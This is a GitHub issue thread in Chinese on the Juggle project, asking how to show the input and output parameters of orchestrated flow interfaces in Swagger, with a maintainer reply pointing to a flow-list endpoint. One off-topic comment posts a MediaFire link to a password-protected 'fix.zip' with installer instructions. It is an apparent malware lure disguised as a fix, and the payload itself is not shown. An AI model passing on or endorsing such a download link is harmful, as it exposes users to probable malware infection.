### ISSUE TITLE
关于接口文档的问题

### ISSUE THREAD

**Issue by zhenghua0102** [somta/Juggle#23]
### 基础信息
如何支持在（ip:port/doc.html）swagger中查出已部署流程的接口

### 问题描述
如何支持在swagger中查出已部署流程的接口文档

### 复现步骤
1.
2.
3.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by somta** [comment]
> ### 基础信息
> 如何支持在（ip:port/doc.html）swagger中查出已部署流程的接口
> 
> ### 问题描述
> 如何支持在swagger中查出已部署流程的接口文档
> 
> ### 复现步骤
> 
> ### 错误日志或截图

程序启动后可以通过 http://127.0.0.1:9127/doc.html#/API%E6%8E%A5%E5%8F%A3/%E6%B5%81%E7%A8%8B%E7%89%88%E6%9C%AC%E6%8E%A5%E5%8F%A3/getFlowVersionPageList 查询已经部署的流程列表

**Comment by zhenghua0102** [comment]
不是这个意思，就是通过流程编排出来的接口，如何在swagger中看这个接口的出入参，方便和别人对接呢。
